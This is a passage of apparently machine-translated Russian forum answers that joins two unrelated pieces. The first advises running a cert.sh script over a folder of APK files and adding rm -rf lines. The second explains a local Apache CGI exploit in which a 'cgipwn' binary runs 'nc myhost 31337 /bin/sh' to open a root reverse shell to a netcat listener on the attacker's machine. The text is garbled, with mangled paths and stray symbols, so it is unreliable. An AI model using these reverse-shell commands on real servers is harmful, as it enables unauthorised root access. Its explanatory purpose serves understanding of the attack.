Сценарий ожидает аргумент при выполнении. Этот аргумент - каталог, в котором находится *. Apk
.
Аргумент вызывается в сценарии строкой cd $ 1
, так аргументы вызываются в сценариях оболочки.
Пожалуйста, попробуйте перезапустить ваш скрипт следующим образом: sh cert.sh path / where / apks / leave>
и посмотрите, решит ли это вашу проблему?
Кроме того, до ] для цикла
добавьте строки rm -rf other
и rm -rf none
, чтобы удалить ошибки, относящиеся к существующим папкам.
Итак, перечитав информацию об эксплойте несколько раз, я усомнился в словосочетании "локальный злоумышленник": означает ли это, что уязвимость может быть использована только из та же машина, на которой запущен уязвимый Apache? В этом случае я понимаю, что злоумышленник должен заранее иметь учетные данные действительного пользователя на машине с разрешениями на управление apache (что значительно снизит применимость атаки).
Да, вы правы. На самом деле веб-сервер
является целевым сервером с этой уязвимостью, myhost
- это машина злоумышленника.
Поместив двоичный файл cgipwn
в каталог / cgi-bin
веб-сервера
и открыв http: // webserver / cgi-bin / cgipwn ? ...
, злоумышленник пытается запустить nc myhost 31337 / bin / sh
на веб-сервере
от имени пользователя, запустившего Apache (обычно root
) .
Злоумышленник ранее запускал nc -vvv -l -p 31337
на myhost
, чтобы принять соединение nc
с веб-сервера
. Если все пойдет хорошо, злоумышленник получит доступ к интерактивному сеансу / bin / sh
, запущенному от имени стартового пользователя Apache на веб-сервере
.